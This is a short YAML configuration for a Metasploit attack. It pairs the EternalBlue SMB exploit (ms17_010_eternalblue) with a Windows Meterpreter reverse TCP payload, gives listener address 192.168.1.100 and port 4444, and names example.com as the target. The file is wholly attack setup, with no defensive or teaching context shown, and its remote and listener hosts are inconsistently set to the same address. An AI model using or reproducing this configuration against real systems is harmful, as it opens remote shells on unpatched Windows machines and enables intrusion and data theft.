target: "example.com"

payload:
  type: "windows/meterpreter/reverse_tcp"
  lhost: "192.168.1.100"
  lport: "4444"

metasploit:
  exploit: "exploit/windows/smb/ms17_010_eternalblue"
  payload: "windows/meterpreter/reverse_tcp"
  rhost: "192.168.1.100"
  lhost: "192.168.1.100"
  lport: "4444"
